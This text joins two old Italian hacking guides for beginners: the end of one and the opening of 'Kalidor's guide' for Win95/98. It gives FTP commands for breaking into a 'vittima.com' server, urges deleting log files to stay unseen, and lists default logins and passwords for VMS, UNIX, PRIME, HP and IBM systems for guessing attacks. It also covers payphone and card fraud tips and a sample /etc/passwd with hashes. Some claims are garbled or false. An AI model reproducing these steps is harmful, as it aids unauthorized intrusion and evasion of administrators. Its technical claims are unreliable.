Ci sono alcuni programmi, diversi dal comando "ed" che permettono di 
addizionare lo user al sistema ma molti non permettono di inserirsi 
come root o con UID meno di 100. Uno di questi programmi è chiamato 
"adduser". 

Quello che segue è quello che devi fare se vuoi un indirizzo di posta 
elettronica su di un computer: 

Se lo Unix in questione ( quello in cui devi mettere la tua email ) ha 
l'uucp oppure è una università, ci sono possibilità di fare il 
traserimento di posta elettronica. 

Tu ora puoi testare lo Unix mandando una mail ad un tuo amico oppure a 
te stesso e se quando ti arriva, il mittente è indicato come "smail" 
probabilmente significa che il sistema può mandare le mail UUCP. 
Questo è un buon metodo per prendere contatto con le persone in maniera 
tranquilla e sicura. 


Hackerare un sito ftp tramite l'FTP di windows95: 


TYPE 

ftp vittima.com ( vittima.com e' il sito da hackerare ) 

Il server ora puo' richiedere uno username...premere INVIO. 

Ora il server richiedera' la password...premere anche qui INVIO. 
Poi digitare: 

quote user ftp 

e poi: 

quote cwd -root 

in seguito: 

quote pass ftp 


Sii sicuro di cancellare i log file per fare in modo di renderti 
"invisibile" al system operator. 

Per fare questo metodo il sistema deve essere un po' vecchiotto ( anche 
se non so' quanto ). 

Funziona soprattutto con i vecchi server ( universita' americane ). 

E' lo stesso con UNIX, LINUX e 05/2. 

Funziona anche con gli account anonymous che richiedono l'inserimento 
della email come password. 


SNIFFER??? 


Che cos'e' uno sniffer? 


Lo sniffer e' un programma che, rilasciato sopra qualche server, ne 
cattura le informazioni richieste e le trattiene fino a lettura o le 
invia ad un destinatario ( ad esempio ). 
L'atto di catturare di queste informazioni e' chiamato sniffing. 
Molte delle piu' popolari connessioni tramite computer si eseguono 
attraverso ethernet. 
Il protocollo Ethernet lavora mandando pacchetti di informazioni a 
tutti gli host dello stesso circuito. 
L'inizio del pacchetto contiene l'indirizzo proprio della macchina di 
destrinazione. 
Solo il computer con l'indirizzo uguale e' predisposto ad accettare 
quel pacchetto; per non fare confronti bisogna porre la macchina in 
modo chiamato "promiscuo". 
A causa del fatto che in un normale scambio di informazioni attraverso 
network, account e password sono inviati attraverso ethernet in normale 
testo non cifrato, non e' difficile per un intruso, una volta che ha 
ottenuto il livello di superuser, porre la macchina in modo "promiscuo" 
e, facendo lo sniffing, compromettere tutte le macchine sulla rete di 
quel computer. 
Dove si possono trovare gli sniffer? 
Lo sniffing e' una delle piu' popolari tecniche di attacco degli 
hackers. 
Uno speciale sniffer chiamato Esniff.c, veramente piccolo, e' stato 
creato per lavorare sulle stazioni SunoS e riesce a catturare "solo" i 
primi 300 bytes delle sessioni di telnet, ftp e rlogin. 
Questo e' stato pubblicato in Phrack, cioe' uno dei giornali hackers 
piu' letti di tutta internet. 
I vari articoli del Phrack si possono trovare su diversi siti ftp. 
L'Esniff.c e' rimediabile all'ftp: 
coombs.anu.edu.au:/pub/net/log. 
Tu, lanciando lo sniffer su di un network autorizzato, puoi vedere come 
questo comprometta tutte le macchine della rete. 
Altri sniffer, tesi a risolvere i debug dei programmi di rete 
sono:*Etherfind sul SunOS 4.1.x 
*Snoop sul Solaris 2.x e SunOS 4.1 ( ftp playground.sun.com ) 
*Tcpdump 3.0 
*Packetman, Interman, Etherman, Loadman lavorano sulle seguenti 
piattaforme: 
SunOS, Dec-mips, SGI, Alpha e Solaris 
ftp.cs.curtin.edu.au:/pub/netman/[sun4c]|dec- 
mips|sgi|alpha|solaris2]/[Etherman-1.1a|Interman-1.1] 
loadman-1.0|packetman-1.1].tar.gz 
Lo sniffer chiamato Packerman ( cosi' come Etherman o Interman ) 
e' stato creato per catturare 
pacchetti di informazioni mentre Loadman per monitorare il 
traffico tra i computer. 
Sniffer per il DOS: 
*Gobbler per macchine IBM DOS 
*Ethdump v1.03 
ftp.germany.eu.net:/pub/networking/inet/ethernet/ethdp103.zip 
*Ethload v1.04 
ftp.germany.eu.net:/pub/networking/monitoring/ethload/ethld104.zi 


p 


Sniffer commerciali: 


*Network General 

La network general produce numerosi prodotti. I piu' importanti sono 
gli Expert Sniffer, che non solo corrono su tutta la rete ma possono 
anche caricare pacchetti attraverso un sistema ad alte prestazioni 
diagnosticando i problemi per te. 


*Microsoft's Net Monitor 
Come si individua se vi e' uno sniffer su di un sistema? 


Per individuare uno sniffer che raccoglie solo dati e non risponde a 
informazioni bisogna fisicamente verificare tutti i propri collegamenti 
Ethernet, controllandoli uno ad uno. 

E' impossibile verificare in modo remoto un computer mandandogli un 
pacchetto di informazioni o facendo un ping alla macchina se questa e' 
stata "sniffata". 

Uno sniffer che e' stato lanciato su di una macchina, mette 
l'interfaccia in modo promiscuo con il quale accetta tutti i pacchetti 
di informazioni. Su alcuni sistemi UNIX e' possibile individuare se una 
macchina e' stata messa in modo promiscuo. 

E' possibile lanciare uno sniffer su di una macchina in maniera non 
promiscua ma questo intercettera' solamente le informazioni che sono 
state lanciate direttamente dalla macchina. 

E' anche possibile per l'intruso eseguire una simile cattura di 
informazioni lanciando alcuni trojan horse ( vedi sopra ) su diversi 
programmi come telnet, rlogin, in.telnetd e altri. 

Tutti questi tipi di attacchi compromettono solo le sessioni che 
vengono da una macchina invece lo sniffing in modo promiscuo 
compromette TUTTE le sessioni su Ethernet. 

Per SunOS, NetBSD e altri possibili derivati BSD dello UNIX c'e' un 
comando "ifconfig -a" che ti dice tutte le informazioni su tutte le 
interfacce e se loro sono in modo promiscuo. 

Sul DEC 0SF/1 e IRIX e altri possibili 0S, bisogna specificare che 
interfaccia si vuole verificare. 

La sola via per trovare quale interfaccia e' su di un sistema e questa: 
eseguire: 

# netstat -r 

Routing tebles 


Internet: 

Destination Gateway Flags Refs Use 
Interface 

default iss.net UG 1 24949 
leo 

localhost localhost UH 2 83 100 


Poi tu puoi testare ogni interfaccia eseguendo il seguente comando: 
# ifconfig le0 

le0: 

flags=8863<UP, BROADCAST, NOTRAILERS, RUNNING, PROMISC, MULTICAST> 
inet 127.0.0.1 netmask Oxffffff00 broadcast 255.0.0.1 


Gli hackers spesso rimpiazzano comandi come ifconfig per evitare 
l'individuazione. 


C'e' un programma chiamato cpm scaricabile a: 
ftp.cert.org:/pub/tools/cpm che lavora solo sul Sunos e ispeziona 
l'interfaccia per le "primiscuous flag". 


L'Ultrix puo' individuare qualcuno che lancia uno sniffer usando il 
comando pfstat e pfconfig. 

"pfconfig" ti permette di settare chi puo' usare uno sniffer. 
"pfstat" ti mostra se le interfacce sono in modo promiscuo. 

Questi comandi funzionano solo se lo sniffing e' abilitato linkandolo 
nel kernel. 

Per default, lo sniffer NON e' linkato nel kernel, 


Molti altri sistemi UNIX, come Irix, Solaris, SCO, ecc, non hanno 
indicazioni sulle flags ( se sono in modo promiscuo o no ) e quindi un 
intruso puo' fare uno sniffig sul tuo sistema senza essere individuato. 


Spesso un "log sniffer" ( sniffer di inserimento ) diventa un grande 
file. Su un network con molti computer collegati ad esso, uno sniffer 
puo' dar luogo a lunghi caricamenti sulla macchina sniffata. Qualche 
volta questo mette in allarme gli amministratori di sistema e cosìl' 
possono arrivare a scoprire uno sniffer. 

Io suggerisco di usare lsof ( LiSt Open Files ) scaricabile da: 
coast.cs.purdue.edu:/pub/Purdue/lsof 

Questo programma trova i log file e i programmi che accedono ai 
pacchetti di informazioni su di un sistema come il /dev/nit sul Sunos. 


Non esiste un comando ( per quanto ne so' ) per individuare una 
macchina IBM PC posta in maniera "promiscua", ma solitamente queste 
macchine non permettono comandi di esecuzione tranne che dalla console 
principale e quindi intrusi che operano in modo remoto non possono 
cambiare un computer PC in uno sniffer senza avere aiuto dall'interno. 


INFORMAZIONI SUI SISTEMI OPERATIVI: 


Nota: 
Sotto ogni descrizione riporto una lista delle piu' comuni password e 
login del sistema citato. 


VMS: 


I computer VAX e' stato creato dalla Digital Equipment Corporation ( 
DEC ) ed usa il VMS ( Virtual Memory System ). Questo sistema e' 
caratterizzato dal prompt con la scritta "Username:". 

Il "bello" di questo sistema e' che non ti dice se hai sbagliato ad 
inserire un username e ti puo' disconnettere dopo tre tentativi errati 
di inserimento. 

Il VMS registra anche le tracce di tutti i tentativi falliti di login e 
informa il possessore dell'account quanti tentativi sono stati fatti 
sbagliati sul suo account. Questo e' uno dei piu' sicuri sistemi 
operativi che sono in circolazione contro gli attacchi dall'esterno ma 
una volta dentro ci sono molte cose che si possono fare per evitare le 
barriere di sicurezza erette dal sistema. Il VAX ha anche il migliore 
set di file di aiuto del mondo. 

Digita HELP per vederli. 


Login: Password: 

SYSTEM: OPERATOR, MANAGER, SYSTEM oppure SYSLIB 
OPERATOR: OPERATOR 

SYSTEST: UETP 

SYSMAINT: SYSMAINT, SERVICE oppure DIGITAL 

FIELD: FIELD o SERVICE 

GUEST: GUEST o privo di password 

DEMO: DEMO o privo di password 

DECNET: DECNET 

DEC-10 


Una linea della DEC usa il sistema TOPS-10. Queste macchine sono 
individuabili dal prompt "." 

La serie DEC 10/20 sono dette "amiche degli hackers" in quanto 
permettono molti importanti comandi senza neppure aver effettuato il 
login. 


Tu puoi prendere una lista di accounts e di process name di tutti 
quelli collegati al sistema senza collegarti ad esso digitando .systat 
( sta per SYstem STATUS ). 

Se tu leggi una cosa tipo: 

[234, 1001]BOB JONES, tenta BOB o JONES o tutti e due per la password su 
questo account. 

Gli account sono in questo formato [xxx,Yyyy]. 

Per effettuare il login digitare .login xxx,yyy e poi inserisci la 
password quando ti viene richiesta. 

Il sistema ti permette illimitati tentativi di login su di un account e 
non registra le tracce di quelli falliti. 

Ti informa anche se il UIC ( UIC=User Identification Code ) che stai 
tentando e' sbagliato. 


Login: Password: 

1,2: SYSLIB, OPERATOR oppure MANAGER 
Di; MAINTAIN 

5,30: GAMES 

UNIX 


Ci sono dozzine di differenti macchine che possono usare lo UNIX. 
Sebbene per alcuni non sia il miglior sistema operativo del mondo, e' 
certamente il piu' usato. Un sistema UNIX ha solitamente un prompt del 
tipo "login:". Il sistema UNIX permette illimitati tentativi di accesso 
( in molti casi ) e SOLITAMENTE non registra le tracce dei login 
falliti. 

Nota sulle password: 

Il sistema operativo UNIX e' molto sensibile e quindi scrivere 
InfectedM al posto di infectedm e' completamente diverso. 


Login: Password: 
root: root 

admin: admin 

sysadmin: sysadmin or admin 
unix: unix 

UUCp: uucp 

rje: rje 

guest: guest 

demo: demo 

daemon: daemon 

sysbin: sysbin 


Comunque per le password dello unix guardate anche la lista nel 
capitolo dedicato all'hacking di questa guida. 


PRIME 


Il computer centrale della PRIME usa il sistema operativo PRIMOS. Si 
puo' facilemente identificare con la scritta che appare cioe': 
"Primecon 18.23.05" o qualcosa di simile che dipende dalla versione del 
sistema operativo. Solitamente non da' prompt questo sistema operativo. 
A questo punto digita "login". Se il sistema e' un versione pre del 
18.00.00 del Primos tu puoi premere una serie di /AC al posto della 
password e ritrovarti dentro. Sfortunatamente la maggior parte delle 
persone utilizza versioni superiori alla 19+. Il sistema Primos ha 
anche degli ottimi file di aiuto. Uno dei piu' utili comandi che si 
puo' utilizzare in questo sistema e' chiamato: NETLINK. Una volta che 
ti sei inserito nel computer digita NETLINK e segui i file di aiuto. 


Questo ti permette di connetterti agli NUA di tutto il mondo usando il 
comando "nc". Per esempio per connettersi al NUA 026245890040004 tu 
devi digitare @nc :26245890040004 nel prompt del netlink. 


Login: Password: 
PRIME PRIME o PRIMOS 


PRIMOS_CS PRIME o PRIMOS 
PRIMENET PRIMENET 


SYSTEM SYSTEM o PRIME 
NETLINK NETLINK 

TEST TEST 

GUEST GUEST 

GUESTI1 GUEST 

HP-x000 


Questo sistema e' stato creato dalla Hewlett Packard ed e' 
caratterizzato dal prompt con i due punti ":" 

L'HP ha una delle piu' complicate sessioni di login che girino sotto 
computer: 

1) Hello Session Name 

2) UserName 

3) AccountName 

4) Group. 

Fortunatamente qualcuno di questi campi puo' essere bianco in alcuni 
casi ma possono anche essere tutti protetti da password e quindi non e' 
un sistema semplice in cui entrare. 

In generale, se il default non funziona bisogna tentare un brute force 
usanto la password list comune. 

L'HP-x000 usa il sistema operativo MPE e il prompt e' qualcosa come ":" 


Login: Password: 

MGR. TELESUP, PUB User: MGR Acct: HPONLY Grp: PUB 
MGR.HPOFFICE, PUB privo di password 

MANAGER. ITF3000, PUB privo di password 

FIELD. SUPPORT, PUB user: FLD, others, privo di password 
MAIL. TELESUP, PUB user: MAIL, others, privo di password 
MGR.RJE privo di password 

FIELD.HPP189 , HPP187, HPP189, HPP196 privo di password 

MGR. TELESUP, PUB, HPONLY, HP3 privo di password 

IRIS 


IRIS sta per Interactive Real Time Information System. Originariamente 
girava solo sotto i PDP-11 ma ora gira sotto piu' macchine. 

Si puo' identificare dalla scritta 'Welcome to "IRIS" R9.14 
Timesharing' e per la scritta ACCOUNT ID? nel prompt. 

IRIS permette illimitati tentativi di hackeraggio e non registra i 
tentativi falliti. Non conosco password di default provare quindi con 
le password della lista sopra. 


Login: 


MANAGER 
BOSS 
SOFTWARE 
DEMO 
PDP8 
PDP11 


ACCOUNTING 
VM/CMS 


Il sistema operativo VM/CMS e' funzionante sopra le International 
Business Machine ( IBM ). Quando ti connetti ad uno di questi tu puoi 
ricevere un messaggio tipo 'VM/370 ONLINE' e un prompt "." come il 
TOPS-10. Per fare il login digitare 'LOGON'. 


Login: Password: 
AUTOLOGI1: AUTOLOG or AUTOLOGI1 
CMS: CMS 

CMSBATCH: CMS or CMSBATCH 
EREP: EREP 

MAINT: MAINT or MAINTAIN 
OPERATNS: OPERATNS or OPERATOR 
OPERATOR: OPERATOR 

RSCS: RSCS 

SMART: SMART 

SNA: SNA 

VMTEST: VMTEST 

VMUTIL: VMUTILV 

TAM: VTAM 

NOS 


NOS sta per Networking Operating System e funziona sui computer Cyber 
creati dalla Control Data Corporation. Il NOS si identifica facilmente 
dalla scritta 'WELCOME TO THE NOS SOFTWARE SYSTEM. COPYRIGHT CONTROL 
DATA 1978, 1987'. Il primo prompt di comandi che ti potrebbe apparire e' 
FAMILY:. Qua premi invio. Poi ti dovrebbe apparire lo USER NAME:. 

Lo username e' solitamente lungo 7 caratteri alfanumerici ed e' 
ESTREMAMENTE sito-dipendente. Gli account degli operatori solitamente 
sono qualcosa del tipo: 7ETPDOC. 


Login: Password: 
$SYSTEM unknown 
SYSTEMV unknown 
DECSERVER 


Questo non e' realmente un sistema ma e' un server di un network che ha 
differenti macchine collegate a 

lui. Un decserver puo' dire 'Enter Username>' quando ti connetti al 
sistema. Questo puo' essere qualsiasi cosa e puo' non significare 
niente...e' solo un'identificatore. Premi 'c' a questo punto per 
entrare. Ora ti si presentera' la scritta 'Local>'. Da qua premi ancora 
'c' per connetterti al sistema. Per prendere una lista dei nomi nel 
sistema, digita 'sh services' oppure 'sh nodes'. Se hai qualche 
problema gli aiuti online sono disponibile digitando il comando 'help'. 
Dai un occhio a servizi chiamati 'MODEM' oppure 'DIAL' o qualcosa di 
simile, questi sono spesso outdial modem e possono essere d'aiuto. 


GS/1 
Un altro tipo di network server. Diversamente dal Decserver tu non puoi 


predirre quale prompt ti dara' il gateway del GS/1. Il default e' 
'65/1>' ma questo e' ridefinibile dall'amministratore di sistema. 


Per testare il GS/1 digita 'sh d'. Se questo comando stampa a video una 
lista di default ( velocita' del terminale, prompt, parita', etc. ) tu 
sei su un GS/1. Tu ti puoi connettere alla stessa maniera del Decserver 
premendo 'c'. Per trovare quali sistemi sono disponibili premi 'sh n' 
oppure 'sh c'. Un altro trucchettino e' 'sh m' perche' qualche volta ti 
stampa a video una lista di macros per effettuare il login in un 
sistema. Se c'e' una macro chiamata VAX, per esempio, digita 'do VAX'. 


SISTEMI IRRESPONSABILI 


Occasionalmente tu ti puoi connettere ad un sistema che non ti dice 
nulla e non fa' nulla. Questa e' una cosa abbastanza frustrante ma un 
approccio con metodo ad un sistema puo' farti risparmiare un sacco di 
tempo. La seguente lista di cosa da fare ti puo' aiutare: 

1) Cambia la tua parita', lunghezza dei dati e stop dei bits. Se un 
sistema non risponde con 8N1, puo' rispondere con 7E1 o 8E2 o 7S2. Se 
tu non hai un terminale che cambi i settaggi a EVEN, ODD, SPACE, MARK o 
NONE con una lunghezza di 7 o 8 e 1 o 2 stop bits vai subito a 
comprarne uno. Avere un buon programma e' assolutamente necesssario e, 
sicuramente, di aiuto. 

2) Cambia il tuo baud rate ( velocita' di collegamento ). Ancora, se tu 
hai un programma che ti permette di scegliere la tua velocita' di 
connessione ( ad esempio 600 o 1100 ) potresti essere capace di 
penetrare un sistema che, senza il cambio di velocita' di connessione 
non potresti hackerare. Molti sistemi dipendono dalla velocita' ed 
alcuni hanno una strana velocita' di connessione e questo sembra che in 
alcuni sia tutta la sicurezza di cui i sistemi necessitano ( almeno 
secondo i loro amministratori ). 

3) Manda una serie di 's. 

4) Manda un hard break seguito da una a. 

5) Manda una serie di . I Datapac network canadesi rispondono a questo. 
6) Se tu ottieni un garbage premi una i. Tymnet risponde a questo come 
MultiLink II. 

7) Inizia a mandare dei control con delle lettere a partire da AA e 
findendo AZ. 

8) Cambia la tua emulazione di terminale. 

9) Digita LOGIN, HELLO, LOG, ATTACH, CONNECT, START, RUN, BEGIN, LOGON, 
GO, JOIN, HELP e qualsiasi altra cosa tu pensi che ti possa servire. 
10) Se conosci il numero della compagnia da hackerare prova a chiamarli 
e sparare un sacco di balle per farti dare informazioni in piu'. 


PHREAKING IN ITALIA 


A dir la verita' ne so' poco o nulla del phreaking in Italia ma 
comunque vi dico ogni cosa mi viene in mente. 

Ho letto da qualche parte anche se non ricordo bene dove alcune cose 
riguardanti le cabine telefoniche italiane ( quelle dotate di lettore 
schede ): 

Se si telefona a qualcuno e questo qualcuno alza IMMEDIATAMENTE la 
cornetta ( quando si dice immediatamente si intende senza quasi sentire 
lo squillo ) il lettore di schede, a volte, non "sente" l'effettivo 
aggancio della linea telefonica e non fa' spendere nulla. 

Questo funziona su alcune cabine NON su tutte. 

Per ricaricare le tessere magnetiche invece ho sentito due versioni: 

a) Prendete un televisore vecchio e accendetelo per circa due o tre 
ore. Trascorso tale periodo passate la tessera magnetica ( con la banda 
magnetica rivolta verso il vetro della tv ) sopra lo schermo e 
verificate se si e' ricaricata almeno in parte. 

b) Prima di passare la tessera magnetica sopra il televisore dategli 
una spruzzatina di lacca sulla banda magnatica e POI passatela sul 
televisore come sopra. Verificate poi anche questa. 


Io personalmente non ho verificato ma nel momento in cui scrivo alcuni 
amici stanno provando queste teorie. 

Piccola nota: 

Ho sentito in giro voci di persone che avrebbero usato il bluebox ( 
scatoletta che permette di falsificare i segnali telefonici per poter 
telefonare gratis ) in Italia. 

Ora prevedo due cose: 

1) Le persone che dicono di averlo usato lo hanno davvero fatto ma 
magari collegandosi a centralini fuori dal nostro Paese; 

2) Stanno dicendo cagate solamente per farsi belli agli occhi degli 
altri. 

Se volete avere maggiori informazioni sul phreaking in Italia vi 
consiglio di leggere il N°1 di SystemDown nel quale se ne parla molto 
piu' che in questa guida. 


NOTA AGGIUNTIVA - Non mi stanchero’ mai di ripeterlo il blueboxing in 
Italia con la freq 2600Hz non funziona le nuocve centraline hanno un 
sistema molto piu complesso che si basa su piu multifrequenze 
codificate che oscillano parecchio e rendono impossibile il box PER ORA 
- FINE NOTA MrZeRo 

NOTE FINALI: 

Principali siti dove reperire informazioni sull'hacking: 
http://ww.vcalpha.com/silicon/void-f.html ( nel momento in cui scrivo 
non e' attivo ) 

http://www.2600.com 

http://l@0pht.com 

http://underground.org 

http://www.mgmua.com/hackers/index.html 

http://195.32.61.1:80/z0 

Libri consigliati: 

The Hacker Crackdown 

Testi utili sull'hacking e il phreaking ( tutti in inglese o quasi ): 
A Novice's Guide To Hacking 

Alt.2600 Hack Faq 

The Hacker's Handbook 

The Official Phreaker's Manual 

Rainbow Book 

Computer Hackers: Rebel With A Cause 

The Legion Of Doom Technical Journals 

The Ultimate Beginner's Guide To Hacking And Phreaking 

La guida italiana all'hacking :-))) 


SystemDown ( rivista Italiana di hacking/phreaking/cracking/virii ) 


Newgroups sull'hacking e il phreaking: 


alt.2600 ( e suoi derivati ) 
alt .2600.hackerz 

alt .2600.hope.tech 
alt.cellular 
alt.cellular-phone-tech 
alt.comp.virus 
alt.cracks 

alt .cyberpunk 
alt.cyberspace 
alt.dcom.telecom 
alt.fan.lewiz 
alt.hacker 

alt.hackers 
alt.hackers.groups 
alt.hackers.malicious 
alt.hacking 
alt.hackintos 
alt.security 


Canali IRC di hack/phreak Italiani ( consiglio il collegamento dopo le 21.30 ): 
hackers.it 

hacker.it 

phreak.it 

Film da vedere sugli hackers e simili: 

Wargames, giochi di guerra 

Hackers 

I signori della truffa 


Se mi volete scrivere, lo potete fare a: 


InfectedMachine@cryogen.com 
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Disclaimer: 


Usa queste informazioni a TUO rischio e pericolo. Io (Kalidor) e qualsiasi altra persona mi abbia aiutato a 
scrivere questa guida non si assumerà NESSUNA responsabilità per l'uso, l'utilizzo o l'abuso di questo testo. Le 
seguenti informazioni sono state scritte SOLAMENTE per scopo educativo e informativo e NON possono essere 
usati per scopi illegali. Leggendo questo file tu accetti i seguenti termini: 

Comprendo che usare le seguenti informazioni è un atto illegale. Capisco e accetto di essere il SOLO 
responsabile delle mie azioni. Se vengo messo nei guai da queste informazioni NON incolperò o tirerò nei guai 
colui (Kalidor) che ha scritto questo testo o ogni altro suo collaboratore o qualsiasi altra persona mi abbia dato 
questo file. Io capisco che le informazioni qua contenute sono SOLO per scopo di educazione. Questo file può 
essere usato per controllare la sicurezza del TUO sistema. 


Inoltre per leggere questo testo devi possedere un'automobile rosa e avere almeno 154 anni. 


Introduzione: 


Grazie per avere scelto la "Guida di Kalidor all'hacking per Win95/98". Se non hackerete un server in 3 
settimane avrete i vostri soldi indietro. 


Benvenuti alla mia guida. Questa guida è stata fatta appositamente per quelli che l'hacking non sanno nemmeno 
cosa sia (o quasi) e che non hanno mai sentito parlare di linux, unix o robe simili. 

Per i profani l'hacking è l'atto di penetrare nei sistemi trovando la password per il login più privilegiato possibile 
(login e password spiegati dopo). Voi penserete che queste cose si vedono solo nei film di fantascienza e invece 
NO! Ed è incredibilmente facile hackerare. Naturalmente bisogna avere alcune conoscenze sui computer se no 
non sarà molto facile per voi. Questo è quello che dovete sapere prima di iniziare: 


Requisiti di sistema: 


Una buona conoscenza dell'inglese altrimenti sarete spacciati 

Un po' di dimestichezza coi computer ed un po' di autonomia, ad esempio capire come funziona un 
programma senza l'aiuto di qualcuno (magari leggendo il manuale o il readme) 

Una buona dose di fortuna. Se siete sfigati come Paperino lasciate stare (scherzo=)) 

Non avere assolutamente fifa di commettere atti...illegali 

Non essere persone generose e di buon cuore=). Bisogna essere MALEFICIII MUAHAAHAHAAAA (non 
è detto poi...=) 

Avere voglia di fondersi il cervello e stare ore e ore e giorni a provare, riprovare, ririprovare...diventare 
rincoglioniti...etc etc 

Essere maniaci del computer. Se pensate che il computer è uno strumento come un altro lasciate stare...io do 
I NOMI ai computer (sto scrivendo con la mia Arcady;-) 


Bene avete controllato i punti scritti sopra? Siete a posto? QUASI a posto? Ok cominciamo. 
Parte teorica: 


E così comincia la (pallosissima) parte teorica. Vi consiglio VIVAMENTE comunque di leggerla perchè se 
passate subito alla parte pratica ho paura che non capirete molto; nella parte pratica io do' perscontato che 
abbiate letto questa parte o che sappiate già quello che c'è scritto qui. 

Spegnete le luci, staccate il telefono, chiudete le finestre...no che poi non ci vedete un kakkio, buttate fuori a 
calci la ragazza...cominciamo. 


Unix: 


Lo unix (in inglese si legge iùnics=) e il linux (la sua emulazione, cioè adattamento, per il DOS) sono i sistemi 
operativi più importanti in internet poichè esso è stato creato in origine con lo unix. Lo unix è stato fatto 
appositamente per le reti (internet) e si basa soprattutto su di esso. Per imparare ad hackerare dovete conoscere 
bene questo sistema operativo; per consolarvi vi dico che è simile al DOS. 

Quando vi connettete ad un server (come fare è spiegato dopo) sarà quasi sicuramente unix o linux. Una volta 
connessi (sia con ftp o con telnet, spiegato dopo pure questo) vi verrà detto: 


Unix (o linux) Version blablabla on server.hackeroso.com at gg:00:mm 

Login: 

Ecco questa è la famosissima domanda immancabile in tutti i server. Il login è il nome che usate per identificarvi 
quando vi connettete a qualcosa. Nel server ci sono vari login in memoria. A seconda di quale login mettete il 


server vi darà più o meno privilegi nel sistema. Poi il server vi chiederà: 


Password: 


Questa è la password (parola chiave) che uno user (utente) associa al suo login. Quando la scrivete non vedrete 
niente per ragioni di sicurezza. Non vedrete neanche gli asterischi perchè questi determinano la lunghezza della 
password e ciò è fondamentale nello unix. Se sbagliate il login o la password vi verrà detto: 


Login incorrect. 

Login: 

Ciò per tutti gli hacker è molto antipatico. Se invece la password e il login li beccate il server vi dirà: 
Last login on server.blabla.com at gg:mm:aa. 

You have mail. (non essenziale) 


% (oppure:) 
$ 


Questi due caratteri compaiono, seguiti alcune volte da dei commenti del sysop (il proprietario del server) 
quando entrate con un login normale. Quando invece entrate con un login a pieni poteri, di solito il login "root", 
vi verrà scritto: 


# 


Attenzione, alcune volte (ma molto raramente), i sysop possono mettervi questo carattere per farvi credere di 
essere dei root e farvi pensare che potete fare quel che vi pare. Comunque questo è il simbolo che rappresenta gli 
user a pieni poteri. 

Ecco ora i comandi più comuni che potete usare una volta entrati (attenzione, unix e linux sono CASE 
SENSITIVE, ciò vuol dire che maiuscolo e minuscolo non sono la stessa cosa, ad esempio pirla, PIRLA, Pirla, 
PiRIA e pIrLa sono tutte cose diverse. Comunque generalmente in unix quasi tutto è minuscolo): 

Is: da la lista dei file. In pratica è come il DIR /w. Se volete potete scrivere anche: 

ls -al: questo vi da la lista uguale al comando DIR e vi mostra anche i file nascosti 

cd: change directory. Cambia la directory.. è il CD del DOS. Attenzione però: se volete fare un cd.. dovrete 
scrivere cd .. CON LO SPAZIO in mezzo. 

vi: è come l'EDIT. Per muovervi usate le frecce e per uscire ctrl-v. 

mail: legge la mail associata al login che usate. Per avere i comandi della mail scrivere ?. 

rm: uguale a DEL. Cancella i file. 

cp: come COPY. 

mv: come REN. 

pwd: vi dice la directory in cui vi trovate. 

write: è una specie di chat. Usate write nomelogin. 

man: il manuale. Usate man comando. 

cc: compilatore c. 

chmod: cambia i diritti di accesso di un file. Spiegato dopo. 


Quando entrate con uno user specifico, ad esempio kalidor, avrete certi privilegi. Questi privilegi sono 
configurati nel passwd file, localizzato in /etc/passwd (passwd è un file senza estensione, negli unix sono 
comuni). Ora scrivete: 


$pwd 
Current directory is / 
$cd etc 


$vi passwd 


root:wXU9dj5HgegfY:0:root:/root:/bin/bash 
casttwo:JauygjalnO4r.:100:Claudio:/usr/local/WWWCAST:/bin/bash 
alex:DnC3.8ki/Vxbg:100:Alessandro:/usr/local/WWWCAST:/bin/bash 
drago:PhQ93Kkb3uKWk:100:drago:/usr/local/WWWDRAGO:/bin/bash 
erreti:Ac94JrWgDUES5s:100:erreti:/usr/local//WWWERRETI:/bin/bash 
ma:526W/EMIJtPS0I:100:Angelo:/usr/local//WWWWORLDC:/bin/bash 
kalidor:oLi8fwrShd/YA:100:KALIDOR:/usr/local:/bin/bash 
persyst:PjZQgViux0.RY:100:persyst:/usr/local//WWWPERSYST:/bin/bash 
ivars:CpQzohSaJAyeg:100::/usr/local/WWWIVARS:/bin/bash 
sqcons:0a3n.7A28gXaM:100::/usr/local/WWWSQCONS:/bin/bash 
serte:Bcxz01814LOAU:100::/usr/local/WWWSERTE:/bin/bash 
ivar:D8e[IXPHyo4LgY:100::/usr/local//WWWIVAR:/bin/bash 


Bene. Che cacchio è 'sta roba??? E' il file che contiene le PASSWORD per gli user. Prendiamo il mio login: 
kalidor:oLi8fwrShd/YA:100:KALIDOR:/usr/local:/bin/bash 

kalidor è il nome del login, oLi8fwrShd/YA è la password (naturalmente criptata, come decriptarla spiegato 
dopo), 100 è il livello di permission, KALIDOR è la descrizione del login, /usr/local è la directory di partenza e 
/bin/bash è il tipo di unix che state usando. Il vostro obbiettivo è di avere la password per lo user con privilegio 0 
(qui, e in quasi tutti i server, è il root). In certi casi alcuni o tutti i login possono essere così: 
sider:*:100::/usr/local/WWWSIDER:/bin/bash 

* significa che la password è SHADOWED e che quindi non è decriptabile, a meno che non si possa leggere il 
file etc/shadow che contiene le password shadowed. Questo file però è accessibile soltanto dal root o da un login 


0. 


Ora scriviamo ctrl-z per uscire e facciamo: 


$pwd 

Current directory is /etc/ 

$ls -al 

total 4 

drw-r--r--20 1 96 Apr 18 1997. 
drw-r--r--20 20 96 Apr 18 1997 .. 
-TWw-r--1--21 1 96 Apr 18 1997 passwd 
-W-r--1--21 1 96 Apr 18 1997 group 


Che cosa sono quella roba dwr-r-r e le altre simili? Sono le permission per il file. d vuol dire directory, r vuol 
dire read (leggere), w vuol dire write (scrivere) e x vuol dire execute (eseguire). Quando c'è un - vuol dire che la 
certa cosa che dovrebbe stare lì non si può fare. La sequenza di permission completa è drwxrwxrwx (che non 
può esistere dato che una directory non si può eseguire). Dopo la d il primo gruppo di tre lettere è associato al 
root, quindi -rw-r--r-- vuol dire che il root può leggere e scrivere quel file. Il secondo gruppo di tre lettere è 
associato al gruppo, cioè l'insieme di login che ha un certo privilegio (i vari gruppi si possono vedere in 
etc/group e se stai in un login joinabile da un gruppo senza password usa il comando chgrp). L'ultimo gruppo di 
tre lettere è associato allo user normale. 

Ora sapete le cose principali sullo unix. 


IP, Porte & Protocolli: 


Ci sono vari modi di accedere ad un server. Con il browser, con ftp, con telnet e con altre cose. Quando si ci 
connette ad un server il programma che state utilizzando analizza il nome del server (ad esempio 
www.microsoft.com oppure 210.75.4.13) e se è scritto in formato letterale lo converte con il DNS, un 
programma che gira in vari server nelle reti (chiamati name servers) e che converte da letterale a numerico e da 
numerico a letterale. Ad esempio www.microsoft.com corrisponde a 207.46.131.137. Questo numero è 
l'idinteficazione del server e in ogni sezione (separate dal .) possono stare da 1 a 3 numeri. Questo codice si 
